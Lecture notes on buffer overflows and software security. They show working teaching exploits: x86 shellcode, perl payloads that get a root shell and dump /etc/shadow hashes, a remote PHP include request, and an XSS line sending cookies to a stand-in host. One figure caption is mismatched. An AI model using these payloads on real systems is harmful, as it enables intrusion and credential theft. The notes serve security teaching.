Week 4
Buffer Overflow & Software Security

Buffer Overflow
• A very common attack mechanism
  o First widely used by the Morris Worm in 1988
• Prevention techniques known
• Still of major concern
  o Legacy of buggy code in widely deployed operating systems and applications
  o Continued careless programming practices by programmers

Buffer Overflow/Buffer Overrun
A buffer overflow, also known as a buffer overrun, is defined in the NIST Glossary of Key Information Security Terms as follows:
“A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.”

Buffer Overflow Basics
• Programming error when a process attempts to store data beyond the limits of a fixed-sized buffer
• Overwrites adjacent memory locations
  o Locations could hold other program variables, parameters, or program control flow data
• Buffer could be located on the stack, in the heap, or in the data section of the process
Consequences:
• Corruption of program data
• Unexpected transfer of control
• Memory access violations
• Execution of code chosen by attacker

    int main(int argc, char *argv[]) {
        int valid = FALSE;
        char str1[8];
        char str2[8];

        next_tag(str1);
        gets(str2);
        if (strncmp(str1, str2, 8) == 0)
            valid = TRUE;
        printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid);
    }

(a) Basic buffer overflow C code

    $ cc -g -o buffer1 buffer1.c
    $ ./buffer1
    START
    buffer1: str1(START), str2(START), valid(1)
    $ ./buffer1
    EVILINPUTVALUE
    buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0)
    $ ./buffer1
    BADINPUTBADINPUT
    buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)

(b) Basic buffer overflow example runs
Figure 10.1 Basic Buffer Overflow Example

    Memory      Before             After              Contains
    Address     gets(str2)         gets(str2)         Value of
    ....        ....               ....
    bffffbf4    34fcffbf  4...     34fcffbf  3...     argv
    bffffbf0    01000000  ....     01000000  ....     argc
    bffffbec    c6bd0340  ...@     c6bd0340  ...@     return addr
    bffffbe8    08fcffbf  ....     08fcffbf  ....     old base ptr
    bffffbe4    00000000  ....     01000000  ....     valid
    bffffbe0    80640140  .d.@     00640140  .d.@     str1[4-7]
    bffffbdc    54001540  T..@     4e505554  NPUT     str1[0-3]
    bffffbd8    53544152  STAR     42414449  BADI     str2[4-7]
    bffffbd4    00850408  ....     4e505554  NPUT     str2[0-3]
    bffffbd0    30561540  0V.@     42414449  BADI
    ....        ....               ....

Figure 10.2 Basic Buffer Overflow Stack Values

Buffer Overflow Attacks
• To exploit a buffer overflow an attacker needs:
  o To identify a buffer overflow vulnerability in some program that can be triggered using externally sourced data under the attacker’s control
  o To understand how that buffer is stored in memory and determine potential for corruption
• Identifying vulnerable programs can be done by:
  o Inspection of program source
  o Tracing the execution of programs as they process oversized input
  o Using tools such as fuzzing to automatically identify potentially vulnerable programs

Programming Language History
• At the machine level data manipulated by machine instructions executed by the computer processor are stored in either the processor’s registers or in memory
• Assembly language programmer is responsible for the correct interpretation of any saved data value
Modern high-level languages have a strong notion of type and valid operations
• Not vulnerable to buffer overflows
• Does incur overhead, some limits on use
C and related languages have high-level control structures, but allow direct access to memory
• Hence are vulnerable to buffer overflow
• Have a large legacy of widely used, unsafe, and hence vulnerable code

Stack Buffer Overflows
• Occur when buffer is located on stack
• Also referred to as stack smashing
• Used by Morris Worm
• Exploits included an unchecked buffer overflow
• Are still being widely exploited
• Stack frame
• When one function calls another it needs somewhere to save the return address
• Also
needs locations to save the parameters to be passed in to the called function and to possibly save register values

[Figure 10.3 Example Stack Frame with Functions P and Q. P's frame holds: return address, old frame pointer, param 2, param 1. Q's frame holds: return address in P, old frame pointer, local 1, local 2. The figure also marks the frame pointer and the stack pointer.]

[Figure 10.4 Program Loading into Process Memory. The program file supplies global data and program machine code. The process image in main memory, from top of memory to bottom of memory: kernel code and data, stack, spare memory, heap, global data, program machine code, process control block.]

    void hello(char *tag)
    {
        char inp[16];

        printf("Enter value for %s: ", tag);
        gets(inp);
        printf("Hello your %s is %s\n", tag, inp);
    }

(a) Basic stack overflow C code

    $ cc -g -o buffer2 buffer2.c
    $ ./buffer2
    Enter value for name: Bill and Lawrie
    Hello your name is Bill and Lawrie
    buffer2 done
    $ ./buffer2
    Enter value for name: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    Segmentation fault (core dumped)
    $ perl -e 'print pack("H*", "41424344454647485152535455565758616263646566676808fcffbf948304080a4e4e4e4e0a");' | ./buffer2
    Enter value for name:
    Hello your Re?pyy]uEA is ABCDEFGHQRSTUVWXabcdefguyu
    Enter value for Kyyu:
    Hello your Kyyu is NNNN
    Segmentation fault (core dumped)

(b) Basic stack overflow example runs
Figure 10.5 Basic Stack Overflow Example

    Memory      Before             After              Contains
    Address     gets(inp)          gets(inp)          Value of
    ....        ....               ....
    bffffbe0    3e850408  >...     00850408  ....     tag
    bffffbdc    f0830408  ....     94830408  ....     return addr
    bffffbd8    e8fbffbf  ....     e8ffffbf  ....     old base ptr
    bffffbd4    60840408  `...     65666768  efgh
    bffffbd0    30561540  0V.@     61626364  abcd
    bffffbcc    1b840408  ....     55565758  UVWX     inp[12-15]
    bffffbc8    e8fbffbf  ....     51525354  QRST     inp[8-11]
    bffffbc4    3cfcffbf  <...     45464748  EFGH     inp[4-7]
    bffffbc0    34fcffbf  4...     41424344  ABCD     inp[0-3]
    ....        ....               ....

Figure 10.6 Basic Stack Overflow Stack Values

    void getinp(char *inp, int siz)
    {
        puts("Input value: ");
        fgets(inp, siz, stdin);
        printf("buffer3 getinp read %s\n", inp);
    }

    void display(char *val)
    {
        char tmp[16];
        sprintf(tmp, "read val: %s\n", val);
        puts(tmp);
    }

    int main(int argc, char *argv[])
    {
        char buf[16];
        getinp(buf, sizeof(buf));
        display(buf);
        printf("buffer3 done\n");
    }

(a) Another stack overflow C code

    $ cc -o buffer3 buffer3.c
    $ ./buffer3
    Input value:
    SAFE
    buffer3 getinp read SAFE
    read val: SAFE
    buffer3 done
    $ ./buffer3
    Input value:
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    buffer3 getinp read XXXXXXXXXXXXXXX
    read val: XXXXXXXXXXXXXXX
    buffer3 done
    Segmentation fault (core dumped)

(b) Another stack overflow example runs

Table 10.2 Some Common Unsafe C Standard Library Routines

    gets(char *str)
        read line from standard input into str
    sprintf(char *str, char *format, ...)
        create str according to supplied format and variables
    strcat(char *dest, char *src)
        append contents of string src to string dest
    strcpy(char *dest, char *src)
        copy contents of string src to string dest
    vsprintf(char *str, char *fmt, va_list ap)
        create str according to supplied format and variables

Shellcode
• Code supplied by attacker
• Often saved in buffer being overflowed
• Traditionally transferred control to a user command-line interpreter (shell)
• Machine code
• Specific to processor and operating system
• Traditionally needed good assembly language skills to create
• More recently a number of sites and tools have been developed that automate this process
• Metasploit Project
• Provides useful information to people who perform penetration testing, IDS signature development, and exploit research

Figure 10.8 Example UNIX Shellcode

    int main(int argc, char *argv[])
    {
        char *sh;
        char *args[2];

        sh = "/bin/sh";
        args[0] = sh;
        args[1] = NULL;
        execve(sh, args, NULL);
    }

(a) Desired shellcode code in C

          nop
          nop                    // end of nop sled
          jmp  find              // jump to end of code
    cont: pop  %esi              // pop address of sh off stack into %esi
          xor  %eax,%eax         // zero contents of EAX
          mov  %al,0x7(%esi)     // copy zero byte to end of string sh (%esi)
          lea  (%esi),%ebx       // load address of sh (%esi) into %ebx
          mov  %ebx,0x8(%esi)    // save address of sh in args[0] (%esi+8)
          mov  %eax,0xc(%esi)    // copy zero to args[1] (%esi+c)
          mov  $0xb,%al          // copy execve syscall number (11) to AL
          mov  %esi,%ebx         // copy address of sh (%esi) to %ebx
          lea  0x8(%esi),%ecx    // copy address of args (%esi+8) to %ecx
          lea  0xc(%esi),%edx    // copy address of args[1] (%esi+c) to %edx
          int  $0x80             // software interrupt to execute syscall
    find: call cont              // call cont which saves next address on stack
    sh:   .string "/bin/sh "     // string constant
    args: .long 0                // space used for args array
          .long 0                // args[1] and also NULL for env array

(b) Equivalent position-independent x86 assembly code

    90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89
    46 0c b0 0b 89 f3 8d 4e 08 8d
    56 0c cd 80 e8 e1 ff ff ff 2f 62 69 6e 2f 73 68
    20 20 20 20 20 20

(c) Hexadecimal values for compiled x86 machine code

Some Common x86 Assembly Language Instructions

    MOV src, dest               copy (move) value from src into dest
    LEA src, dest               copy the address (load effective address) of src into dest
    ADD / SUB src, dest         add / sub value in src from dest leaving result in dest
    AND / OR / XOR src, dest    logical and / or / xor value in src with dest leaving result in dest
    CMP val1, val2              compare val1 and val2, setting CPU flags as a result
    JMP / JZ / JNZ addr         jump / if zero / if not zero to addr
    PUSH src                    push the value in src onto the stack
    POP dest                    pop the value on the top of the stack into dest
    CALL addr                   call function at addr
    LEAVE                       clean up stack frame before leaving function
    RET                         return from function
    INT num                     software interrupt to access operating system function
    NOP                         no operation or do nothing instruction

Some x86 Registers

    32 bit   16 bit   8 bit    8 bit    Use
                      (high)   (low)
    %eax     %ax      %ah      %al      Accumulators used for arithmetical and I/O operations and execute interrupt calls
    %ebx     %bx      %bh      %bl      Base registers used to access memory, pass system call arguments and return values
    %ecx     %cx      %ch      %cl      Counter registers
    %edx     %dx      %dh      %dl      Data registers used for arithmetic operations, interrupt calls and IO operations
    %ebp                                Base Pointer containing the address of the current stack frame
    %eip                                Instruction Pointer or Program Counter containing the address of the next instruction to be executed
    %esi                                Source Index register used as a pointer for string or array operations
    %esp                                Stack Pointer containing the address of the top of stack

    $ dir -l buffer4
    -rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4
    $ whoami
    knoppix
    $ cat /etc/shadow
    cat: /etc/shadow: Permission denied
    $ cat attack1
    perl -e 'print pack("H*",
    "90909090909090909090909090909090" .
    "90909090909090909090909090909090" .
    "9090eb1a5e31c08846078d1e895e0889" .
    "460cb00b89f38d4e088d560ccd80e8e1" .
    "ffffff2f62696e2f7368202020202020" .
    "202020202020202038fcffbfc0fbffbf0a");
    print "whoami\n";
    print "cat /etc/shadow\n";'
    $ attack1 | buffer4
    Enter value for name: Hello your yyy)DA0Apy is e?^1AFF.../bin/sh...
    root
    root:$1$rNLId4rX$nka7JlxH7.4UJT4l9JRLk1:13346:0:99999:7:::
    daemon:*:11453:0:99999:7:::
    ...
    nobody:*:11453:0:99999:7:::
    knoppix:$1$FvZSBKBu$EdSFvuuJdKaCH8Y0IdnAv/:13346:0:99999:7:::
    ...

Figure 10.9 Example Stack Overflow Attack

Stack Overflow Variants
Target program can be:
• A trusted system utility
• Network service daemon
• Commonly used library code
Shellcode functions:
• Launch a remote shell when connected to
• Create a reverse shell that connects back to the hacker
• Use local exploits that establish a shell
• Flush firewall rules that currently block other attacks
• Break out of a chroot (restricted execution) environment, giving full access to the system

Buffer Overflow Defenses
• Buffer overflows are widely exploited
Two broad defense approaches:
• Compile-time
  o Aim to harden programs to resist attacks in new programs
• Run-time
  o Aim to detect and abort attacks in existing programs

Compile-Time Defenses: Programming Language
• Use a modern high-level language
• Not vulnerable to buffer overflow attacks
• Compiler enforces range checks and permissible operations on variables
Disadvantages
• Additional code must be executed at run time to impose checks
• Flexibility and safety come at a cost in resource use
• Distance from the underlying machine language and architecture means that access to some instructions and hardware resources is lost
• Limits their usefulness in writing code, such as device drivers, that must interact with such resources

Compile-Time Defenses: Safe Coding Techniques
• C designers placed much more emphasis on space efficiency and performance considerations than on type safety
• Assumed programmers would exercise due care in writing code
• Programmers need to inspect the code and rewrite any unsafe coding
• An example of this is the OpenBSD project
• Programmers have audited the
existing code base, including the operating system, standard libraries, and common utilities
• This has resulted in what is widely regarded as one of the safest operating systems in widespread use

    int copy_buf(char *to, int pos, char *from, int len)
    {
        int i;

        for (i=0; i<len; i++) {
            to[pos] = from[i];
            pos++;
        }
        return pos;
    }

(a) Unsafe byte copy

    short read_chunk(FILE *fil, char *to)
    {
        short len;
        fread(&len, 2, 1, fil);    /* read length of binary data */
        fread(to, 1, len, fil);    /* read len bytes of binary data */
        return len;
    }

(b) Unsafe byte input
Figure 10.10 Examples of Unsafe C Code

Compile-Time Defenses: Language Extensions/Safe Libraries
• Handling dynamically allocated memory is more problematic because the size information is not available at compile time
  o Requires an extension and the use of library routines
• Programs and libraries need to be recompiled
• Likely to have problems with third-party applications
• Concern with C is use of unsafe standard library routines
  o One approach has been to replace these with safer variants
• Libsafe is an example
• Library is implemented as a dynamic library arranged to load before the existing standard libraries

Compile-Time Defenses: Stack Protection
• Add function entry and exit code to check stack for signs of corruption
• Use random canary
  o Value needs to be unpredictable
  o Should be different on different systems
• Stackshield and Return Address Defender (RAD)
  o GCC extensions that include additional function entry and exit code
• Function entry writes a copy of the return address to a safe region of memory
• Function exit code checks the return address in the stack frame against the saved copy
• If change is found, aborts the program

Run-Time Defenses: Executable Address Space Protection
Use virtual memory support to make some regions of memory non-executable
• Requires support from memory management unit (MMU)
• Long existed on SPARC / Solaris systems
• Recent on x86 Linux/Unix/Windows systems
Issues
• Support for executable stack code
• Special provisions are needed

Run-Time Defenses: Address Space Randomization
• Manipulate location of key data structures
  o Stack, heap, global data
  o Using random shift for each process
  o Large address range on modern systems means wasting some has negligible impact
• Randomize location of heap buffers
• Random location of standard library functions

Run-Time Defenses: Guard Pages
• Place guard pages between critical regions of memory
  o Flagged in MMU as illegal addresses
  o Any attempted access aborts process
• Further extension places guard pages between stack frames and heap buffers
  o Cost in execution time to support the large number of page mappings necessary

Replacement Stack Frame
Variant that overwrites buffer and saved frame pointer address
• Saved frame pointer value is changed to refer to a dummy stack frame
• Current function returns to the replacement dummy frame
• Control is transferred to the shellcode in the overwritten buffer
Off-by-one attacks
• Coding error that allows one more byte to be copied than there is space available
Defenses
• Any stack protection mechanisms to detect modifications to the stack frame or return address by function exit code
• Use non-executable stacks
• Randomization of the stack in memory and of system libraries

Return to System Call
• Stack overflow variant replaces return address with standard library function
  o Response to non-executable stack defenses
  o Attacker constructs suitable parameters on stack above return address
  o Function returns and library function executes
  o Attacker may need exact buffer address
  o Can even chain two library calls
• Defenses
  o Any stack protection mechanisms to detect modifications to the stack frame or return address by function exit code
  o Use non-executable stacks
  o Randomization of the stack in memory and of system libraries

Heap Overflow
• Attack buffer located in
heap
  o Typically located above program code
  o Memory is requested by programs to use in dynamic data structures (such as linked lists of records)
• No return address
  o Hence no easy transfer of control
  o May have function pointers that an attacker can exploit
  o Or manipulate management data structures
Defenses
• Making the heap non-executable
• Randomizing the allocation of memory on the heap

    /* record type to allocate on heap */
    typedef struct chunk {
        char inp[64];               /* vulnerable input buffer */
        void (*process)(char *);    /* pointer to function to process inp */
    } chunk_t;

    void showlen(char *buf)
    {
        int len;
        len = strlen(buf);
        printf("buffer5 read %d chars\n", len);
    }

    int main(int argc, char *argv[])
    {
        chunk_t *next;

        setbuf(stdin, NULL);
        next = malloc(sizeof(chunk_t));
        next->process = showlen;
        printf("Enter value: ");
        gets(next->inp);
        next->process(next->inp);
        printf("buffer5 done\n");
    }

(a) Vulnerable heap overflow C code

    $ cat attack2
    #!/bin/sh
    # implement heap overflow against program buffer5
    perl -e 'print pack("H*",
    "90909090909090909090909090909090" .
    "9090eb1a5e31c08846078d1e895e0889" .
    "460cb00b89f38d4e088d560ccd80e8e1" .
    "ffffff2f62696e2f7368202020202020" .
    "b89704080a");
    print "whoami\n";
    print "cat /etc/shadow\n";'
    $ attack2 | buffer5
    Enter value:
    root
    root:$1$4oInmych$T3BVS2E3OyNRGjGUzF4o3/:13347:0:99999:7:::
    daemon:*:11453:0:99999:7:::
    ...
    nobody:*:11453:0:99999:7:::
    knoppix:$1$p2wziIML$/yVHPQuw5kvlUFJs3b9aj/:13347:0:99999:7:::
    ...

(b) Example heap overflow attack
Figure 10.11 Example Heap Overflow Attack

Chapter 11
Software Security
• Many vulnerabilities result from poor programming practices
• Consequence of insufficient checking and validation of data and error codes
  o Awareness of these issues is a critical initial step in writing more secure program code
Software error categories:
• Insecure interaction between components
• Risky resource management
• Porous defenses

Table 11.1 CWE/SANS TOP 25 Most Dangerous Software Errors (2011)

Software Security, Quality and Reliability
• Software quality and reliability:
  o Concerned with the accidental failure of program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code
  o Improve using structured design and testing to identify and eliminate as many bugs as possible from a program
  o Concern is not how many bugs, but how often they are triggered
• Software security:
  o Attacker chooses probability distribution, specifically targeting bugs that result in a failure that can be exploited by the attacker
  o Triggered by inputs that differ dramatically from what is usually expected
  o Unlikely to be identified by common testing approaches

Defensive Programming
• Designing and implementing software so that it continues to function even when under attack
• Requires attention to all aspects of program execution, environment, and type of data it processes
• Software is able to detect erroneous conditions resulting from some attack
• Also referred to as secure programming
• Key rule is to never assume
anything, check all assumptions and handle any possible error states

[Figure 11.1 Abstract View of Program. A program executing an algorithm, processing input data and generating output, runs inside a computer system and interacts with: network link, GUI display, keyboard & mouse, file system, other programs, DBMS and database, operating system, machine hardware.]

Defensive Programming
• Programmers often make assumptions about the type of inputs a program will receive and the environment it executes in
  o Assumptions need to be validated by the program and all potential failures handled gracefully and safely
• Requires a changed mindset to traditional programming practices
  o Programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs
• Conflicts with business pressures to keep development times as short as possible to maximize market advantage

• Incorrect handling is a very common failing
• Input is any source of data from outside and whose value is not explicitly known by the programmer when the code was written
• Must identify all data sources
• Explicitly validate assumptions on size and type of values before use

Input Size & Buffer Overflow
• Programmers often make assumptions about the maximum expected size of input
  o Allocated buffer size is not confirmed
  o Resulting in buffer overflow
• Testing may not identify vulnerability
  o Test inputs are unlikely to include large enough inputs to trigger the overflow
• Safe coding treats all input as dangerous

Interpretation of Program Input
• Program input may be binary or text
  o Binary interpretation depends on encoding and is usually application specific
• There is an increasing variety of character sets being used
  o Care is needed to identify just which set is being used and what characters are being read
• Failure to validate may result in an exploitable vulnerability
• 2014 Heartbleed OpenSSL bug is a recent example of a failure to check the validity of a binary input value
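The advice above to validate assumptions on size before use, and to check the validity of a binary input value, can be sketched in C as follows. This is a minimal illustration under stated assumptions, not code from OpenSSL or from the textbook: the record layout (a 2-byte big-endian length followed by the payload) and the names copy_payload and HDR_LEN are hypothetical. The point it shows is that a length field supplied by the sender is checked both against the number of bytes actually received and against the capacity of the destination buffer before any copy is made.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical record layout, assumed for illustration only:
 *   bytes 0..1 : payload length, 16-bit unsigned, big-endian
 *   bytes 2..  : payload
 */
#define HDR_LEN 2u

/* Copy the payload of a length-prefixed record into out.
 *   msg, msg_len : the bytes actually received from the untrusted source
 *   out, out_cap : destination buffer and its capacity in bytes
 * Returns the number of payload bytes copied, or -1 if the claimed
 * length disagrees with what was received or does not fit in out. */
long copy_payload(const uint8_t *msg, size_t msg_len,
                  uint8_t *out, size_t out_cap)
{
    /* NULL pointers are a caller bug, not attacker input. */
    assert(msg != NULL && out != NULL);

    /* Too short to even contain the length field. */
    if (msg_len < HDR_LEN)
        return -1;

    /* The length the sender claims; never trusted on its own. */
    size_t claimed = ((size_t)msg[0] << 8) | (size_t)msg[1];

    /* Reject a claimed length larger than the bytes really present
     * (this would otherwise be a buffer over-read). */
    if (claimed > msg_len - HDR_LEN)
        return -1;

    /* Reject a claimed length larger than the destination
     * (this would otherwise be a buffer overflow). */
    if (claimed > out_cap)
        return -1;

    memcpy(out, msg + HDR_LEN, claimed);
    return (long)claimed;
}
```

A caller would pass the received bytes and their true count, for example copy_payload(buf, nread, out, sizeof out), and treat a return value of -1 as a malformed record to be discarded rather than processed.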
Heartbleed Buffer Overread
The Heartbleed bug is in OpenSSL’s implementation of the TLS heartbeat, which verifies that a connection is still open by sending an arbitrary message and expecting a response to it. When a TLS heartbeat is sent, it comes with a couple of notable pieces of information:
• Some arbitrary payload data. This is intended to be repeated back to the sender so the sender can verify the connection is still alive and the right data is being transmitted through the communication channel.
• The length of that data, in bytes (16 bit unsigned int). We’ll call it len_payload.
The OpenSSL implementation used to do the following:
• Allocate a heartbeat response, using len_payload as the intended payload size
• memcpy() len_payload bytes from the payload into the response
• Send the heartbeat response (with all len_payload bytes) back to the original sender
The problem is that the OpenSSL implementation never checked that len_payload is actually correct, and that the request actually has that many bytes of payload. So, a malicious person could send a heartbeat request indicating a payload length of up to 2^16 - 1 (65535), but actually send a shorter payload. What happens in this case is that memcpy ends up copying beyond the bounds of the payload into the response, giving up to 64k of OpenSSL’s memory contents to an attacker.

It appears that this never actually segfaults because OpenSSL has a custom implementation of malloc that is enabled by default. So, the next memory addresses out of bounds of the received request are likely part of a big chunk of memory that the custom memory allocator is managing and thus would never be caught by the OS as a segmentation violation.

    memcpy(bp, pl, payload);

memcpy is a command that copies data, and it requires three pieces of information to do the job; those are the terms in the parentheses. The first bit of info is the final destination of the data that needs to be copied.
The second is the location of the data that needs to be copied. The third is the amount of data the computer is going to find when it goes to make that copy. In this case, bp is a place on the server computer, pl is where the actual data the client sent as a heartbeat is, and payload is a number that says how big pl is.

The important thing to know here is that copying data on computers is trickier than it seems because there's really no such thing as "empty" memory. So bp, the spot where the client data is going to be copied, is not actually empty. Instead it is full of whatever data was sitting in that part of the computer before. The computer just treats it as empty because that data has been marked for deletion. Until it's filled up with new data, the destination bp is a bunch of old data that has been OK'd to be overwritten. It is still there, however.

• Flaws relating to invalid handling of input data, specifically when program input data can accidentally or deliberately influence the flow of execution of the program
Most often occur in scripting languages
• Encourage reuse of other programs and system utilities where possible to save coding effort
• Often used as Web CGI scripts

    #!/usr/bin/perl
    # finger.cgi - finger CGI script using Perl5 CGI module

    use CGI;
    use CGI::Carp qw(fatalsToBrowser);
    $q = new CGI;    # create query object

    # display HTML header
    print $q->header,
          $q->start_html('Finger User'),
          $q->h1('Finger User');
    print "<pre>";

    # get name of user and display their finger details
    $user = $q->param("user");
    print `/usr/bin/finger -sh $user`;

    # display HTML footer
    print "</pre>";
    print $q->end_html;

(a) Unsafe Perl finger CGI script

    <html><head><title>Finger User</title></head><body>
    <h1>Finger User</h1>
    <form method=post action="finger.cgi">
    <b>Username to finger</b>: <input type=text name=user value="">
    <p><input type=submit value="Finger User">
    </form></body></html>

(b) Finger form

    Finger User
    Login    Name            TTY   Idle   Login Time   Where
    lpb      Lawrie Brown    p0           Sat 15:24    ppp41.grapevine

    Finger User
    attack success
    -rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi
    -rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html

(c) Expected and subverted finger CGI responses

    # get name of user and display their finger details
    $user = $q->param("user");
    die "The specified user contains illegal characters!"
        unless ($user =~ /^\w+$/);
    print `/usr/bin/finger -sh $user`;

(d) Safety extension to Perl finger CGI script
Figure 11.2 A Web CGI Injection Attack

    $name = $_REQUEST['name'];
    $query = "SELECT * FROM suppliers WHERE name = '" . $name . "';";
    $result = mysql_query($query);

(a) Vulnerable PHP code

    $name = $_REQUEST['name'];
    $query = "SELECT * FROM suppliers WHERE name = '" .
        mysql_real_escape_string($name) . "';";
    $result = mysql_query($query);

(b) Safer PHP code
Figure 11.3 SQL Injection Example

    <?php
    include $path . 'functions.php';
    include $path . 'data/prefs.php';
    …

(a) Vulnerable PHP code

    GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

(b) HTTP exploit request
Figure 11.4 PHP Code Injection Example

• Attacks where input provided by one user is subsequently output to another user
• Commonly seen in scripted Web applications
  o Vulnerability involves the inclusion of script code in the HTML content
  o Script code may need to access data associated with other pages
  o Browsers impose security checks and restrict data access to pages originating from the same site
• Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site
• XSS reflection vulnerability
  o Attacker includes the malicious script content in data supplied to a site

    Thanks for this information, its great!
    <script>document.location='http://hacker.web.site/cookie.cgi?'+
    document.cookie</script>

(a) Plain XSS example

    Thanks for this information, its great!
    &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
    &#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;
    &#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111;
    &#110;&#61;&#39;&#104;&#116;&#116;&#112;&#58;
    &#47;&#47;&#104;&#97;&#99;&#107;&#101;&#114;
    &#46;&#119;&#101;&#98;&#46;&#115;&#105;&#116;
    &#101;&#47;&#99;&#111;&#111;&#107;&#105;&#101;
    &#46;&#99;&#103;&#105;&#63;&#39;&#43;&#100;
    &#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;
    &#99;&#111;&#111;&#107;&#105;&#101;&#60;&#47;
    &#115;&#99;&#114;&#105;&#112;&#116;&#62;

(b) Encoded XSS example
Figure 11.5 XSS Example

Validating Input Syntax
• It is necessary to ensure that data conform with any assumptions made about the data before subsequent use
• Input data should be compared against what is wanted
• Alternative is to compare the input data with known dangerous values
• By only accepting known safe data the program is more likely to remain secure

• May have multiple means of encoding text
• Growing requirement to support users around the globe and to interact with them using their own languages
• Unicode used for internationalization
  o Uses 16-bit value for characters
  o UTF-8 encodes as 1-4 byte sequences
  o Many Unicode decoders accept any valid equivalent sequence
• Canonicalization
  o Transforming input data into a single, standard, minimal representation
  o Once this is done the input data can be compared with a single representation of acceptable input values

• Additional concern when input data represents numeric values
• Internally stored in fixed sized value
  o 8, 16, 32, 64-bit integers
  o Floating point numbers depend on the processor used
  o Values may be signed or unsigned
• Must correctly interpret text form and process consistently
  o Have issues comparing signed to unsigned
  o Could be used to thwart buffer overflow check

Input Fuzzing
• Developed by Professor Barton Miller at the University of Wisconsin Madison in 1989
• Software testing technique that uses randomly generated data as inputs to a program
  o Range of inputs is very large
  o Intent is
to determine if the program or function correctly handles abnormal inputs o Simple, free of assumptions, cheap o Assists with reliability as well as security • Can also use templates to generate classes of known problem inputs o Disadvantage is that bugs triggered by other forms of input would be missed o Combination of approaches is needed for reasonably comprehensive coverage of the inputs Writing Safe Program Code • Second component is processing of data by some algorithm to solve required problem • High-level languages are typically compiled and linked into machine code which is then directly executed by the target processor Security issues: • Correct algorithm implementation • Correct machine instructions for algorithm • Valid manipulation of data Issue of good program development technique Algorithm may not correctly handle all problem variants Consequence of deficiency is a bug in the resulting program that could be exploited Initial sequence numbers used by many TCP/IP implementations are too predictable Combination of the sequence number as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack to occur Another variant is when the programmers deliberately include additional code in a program to help test and debug it Often code remains in production release of a program and could inappropriately release information May permit a user to bypass security checks and perform actions they would not otherwise be allowed to perform This vulnerability was exploited by the Morris Internet Worm Ensuring Machine Language Corresponds to Algorithm • Issue is ignored by most programmers o Assumption is that the compiler or interpreter generates or executes code that validly implements the language statements • Requires comparing machine code with original source o Slow and difficult • Development of computer systems with very high assurance level is the one area where this level of checking is required o 
Specifically Common Criteria assurance level of EAL 7

Correct Use of Memory
• Issue of dynamic memory allocation
  o Used to manipulate unknown amounts of data
  o Allocated when needed, released when done
• Memory leak
  o Steady reduction in memory available on the heap to the point where it is completely exhausted
• Many older languages have no explicit support for dynamic memory allocation
  o Use standard library routines to allocate and release memory
• Modern languages handle memory allocation and release automatically

Race Conditions
• Without synchronization of accesses it is possible that values may be corrupted or changes lost due to overlapping access, use, and replacement of shared values
• Arise when writing concurrent code whose solution requires the correct selection and use of appropriate synchronization primitives
• Deadlock
  o Processes or threads wait on a resource held by the other
  o One or more programs have to be terminated

Operating System Interaction
• Programs execute on systems under the control of an operating system
  o Mediates and shares access to resources
  o Constructs execution environment
  o Includes environment variables and arguments
• Systems have a concept of multiple users
  o Resources are owned by a user and have permissions granting access with various rights to different categories of users
  o Programs need access to various resources, however excessive levels of access are dangerous
  o Concerns when multiple programs access shared resources such as a common file

Environment Variables
• Collection of string values inherited by each process from its parent
  o Can affect the way a running process behaves
  o Included in the memory of a process when it is constructed
• Can be modified by the program process at any time
  o Modifications will be passed to its children
• Another source of untrusted program input
• Most common use is by a local user attempting to gain increased privileges
  o Goal is to subvert a program that grants superuser or administrator privileges

#!/bin/bash
user=`echo $1 |
sed 's/@.*$//'`
grep $user /var/local/accounts/ipaddrs
(a) Example vulnerable privileged shell script

#!/bin/bash
PATH="/sbin:/bin:/usr/sbin:/usr/bin"
export PATH
user=`echo $1 | sed 's/@.*$//'`
grep $user /var/local/accounts/ipaddrs
(b) Still vulnerable privileged shell script
Figure 11.6 Vulnerable Shell Scripts

• Programs can be vulnerable to PATH variable manipulation
  o Must reset to "safe" values
• If dynamically linked may be vulnerable to manipulation of LD_LIBRARY_PATH
  o Used to locate suitable dynamic library
  o Must either statically link privileged programs or prevent use of this variable

Privilege escalation
• Exploit of flaws may give attacker greater privileges
Least privilege
• Run programs with least privilege needed to complete their function
Determine appropriate user and group privileges required
• Decide whether to grant extra user or just group privileges
Ensure that privileged program can modify only those files and directories necessary

Programs with root/administrator privileges are a major target of attackers
• They provide highest levels of system access and control
• Are needed to manage access to protected system resources
Often privilege is only needed at start
• Can then run as normal user
Good design partitions complex programs in smaller modules with needed privileges
• Provides a greater degree of isolation between the components
• Reduces the consequences of a security breach in one component
• Easier to test and verify

System Calls and Standard Library Functions
• Programs use system calls and standard library functions for common operations
• Programmers make assumptions about their operation
  o If these assumptions are incorrect, program behavior is not what is expected
  o May be a result of system optimizing access to shared resources
  o Results in requests for services being buffered, resequenced, or otherwise modified to optimize system use
  o Optimizations can conflict with program goals

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]
open file for
writing
for each pattern
    seek to start of file
    overwrite file contents with pattern
close file
remove file
(a) Initial secure file shredding program algorithm

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]
open file for update
for each pattern
    seek to start of file
    overwrite file contents with pattern
    flush application write buffers
    sync file system write buffers with device
close file
remove file
(b) Better secure file shredding program algorithm
Figure 11.7 Example Global Data Overflow Attack

• Programs may need to access a common system resource
• Need suitable synchronization mechanisms
